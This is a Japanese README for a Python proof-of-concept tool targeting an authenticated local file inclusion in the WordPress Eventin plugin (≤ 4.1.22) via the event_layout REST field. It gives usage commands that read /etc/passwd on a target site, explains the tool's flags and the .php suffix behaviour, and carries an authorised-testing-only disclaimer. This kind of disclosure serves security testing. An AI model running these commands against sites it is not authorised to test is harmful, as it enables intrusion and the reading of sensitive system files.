
CVE-2026-15667のPythonによる概念実証。WordPress Eventinプラグインにおける、event_layout RESTフィールドを介した認証済みローカルファイルインクルージョンの脆弱性です。
CVE-2026-15667 WordPress Event Solution LFI POC
Eventin (WordPressプラグイン wp-event-solution) ≤ 4.1.22 — event_layout RESTフィールドを介した認証済み(Contributor以上)のローカルファイルインクルージョン。
許可されたテスト専用です。所有していない、またはテストの許可を得ていないシステムに対してこれを実行しないでください。
必要条件: Python 3、標準ライブラリのみ。
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --test
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --test --uname USER --password PASS
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --file /etc/passwd --uname USER --password PASS
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --file /etc/passwd --session 'wordpress_logged_in_HASH=...'
| フラグ | 動作 |
|---|
-u / --url | WordPressサイトルート(必須)。http:// または https://。ホスト名はHTTPSを先に試し、次にHTTPを試行。自己署名TLSは自動的に再試行される。 |
--test | ゲスト: プラグインバージョン + RESTルート。認証あり: トラバーサルをPOSTし、保存されたかを報告 |
--file PATH | LFIを通して PATH をインクルードし、出力を表示。認証が必要 |
--uname | WordPressユーザー名(Contributor以上) |
--password | WordPressパスワード |
--session | ブラウザの Cookie ヘッダー(または wordpress_logged_in_*=...)。/wp-login.php をスキップ |
--uname/--password と --session は互換です。--file および --test の認証部分には、いずれかのペアまたはCookieが必要です。
認証情報なしの --test は未認証です(readme + /wp-json/eventin/v2/events)。インクルード自体は未認証ではありません。
プラグインは {layout}.php をインクルードするため、--file /etc/passwd は /etc/passwd.php をリクエストします。.php パス、または .php が付加された後に存在するパスを渡してください。
標準出力: VERSION、ROUTE、PRESENT、NEED_AUTH、VULNERABLE、NOT_VULNERABLE、AUTH_FAILED、ファイル内容。
CVE: CVE-2026-15667。Wordfence PRISMによる報告。